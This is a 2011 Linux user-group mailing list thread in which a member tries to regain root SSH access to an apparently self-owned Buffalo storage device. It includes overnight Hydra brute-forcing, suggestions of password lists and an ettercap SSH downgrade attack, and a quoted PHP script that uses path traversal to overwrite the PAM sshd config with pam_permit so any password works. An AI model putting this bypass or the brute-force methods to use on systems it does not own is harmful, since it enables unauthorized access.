I believe the script.php has to be moved the webroot directory and given permissions there I believe, but well if you can't get a login via ssh... -- how to do it? On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips wrote: > On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold wrote: > >> There are alot of password files and dictionary lists on various sites. >> Backtrack5 contains a good number. >> >> But I imagine that it's either not allowing root via ssh or you have the >> wrong username. >> > > It turns out the box is smarter than a fifth grader.....after a few hydra > attacks, it started rejecting all the hydra attempts to ssh in via root. > Once I stopped hydra (after running all night), it took a couple of hours > before it would respond to ssh attempts from root. It now will ask for the > root password, but I still have no idea what it is. > >> >> Or it's a truely random string. >> > It could be....the password for the zip file to unzip the file system is > > YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4 > > . Someone retrieved it using a disassembler on the file system. > > I did some more reading, and one person was able to use php to allow ssh > login. The box allows one to create a web space, and it comes with php > installed. One can edit the php.ini file, and I can upload via ftp a php > script. The script they suggested is: > $file = '../../../../etc/pam.d/sshd'; > $fh=fopen($file, 'w') or die("can't open file"); > $stringData = "account required pam_unix.so\n"; > fwrite($fh, $stringData); > $stringData = "session required pam_unix.so\n"; > fwrite($fh, $stringData); > $stringData = "auth required pam_permit.so\n"; > fwrite($fh, $stringData); > fclose($fh); > ?> > > I uploaded the script, but I get a 404 File not Found when I access the > page. I thought it might be a file permission error since the file is only > rw. I tried chmod 777 at the ftp prompt, and got the error message File not > Found, but ls shows it is there. > > ftp> ls > 200 PORT command successful > 150 Opening ASCII mode data connection for file list > drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin > drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs > drwxrwxrwx 2 apache apache 39 Jul 17 08:23 log > -rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php > 226 Transfer complete > ftp> chmod 777 script.php > 550 CHMOD 777 script.php: No such file or directory > ftp> > > Is there anything I can change in the php.ini file to make this script > execute? Or, am I missing something else? > > BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead. > > Thanks, > > Mark > >> >> On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips < >> mark@phillipsmarketing.biz> wrote: >> >>> Since this is a drive buffalo, I might try ettercap ssh downgrade attack: >>>> >>>> http://openmaniak.com/ettercap_filter.php >>>> ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade >>>> >>>> Not sure how a man in the middle attack will work, since I don't know >>> the password to begin with... >>> >>> Or Hydra: >>>> >>>> Hydra Instructions: >>>> >>>> http://www.youtube.com/watch?v=7CP-JB4QARo >>>> >>>>> >>>>>> Hydra is promising. I tried it with the common passwords list from >>> openwall. No luck. Do you have any better password lists? >>> >>> Thanks, >>> >>> Mark >>> >>> --------------------------------------------------- >>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us >>> To subscribe, unsubscribe, or to change your mail settings: >>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss >>> >> >> >> >> -- >> (602) 791-8002 Android >> (623) 239-3392 Skype >> (623) 688-3392 Google Voice >> ** >> HomeSmartInternational.com >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> --------------------------------------------------- >> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us >> To subscribe, unsubscribe, or to change your mail settings: >> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss >> > > > --------------------------------------------------- > PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us > To subscribe, unsubscribe, or to change your mail settings: > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com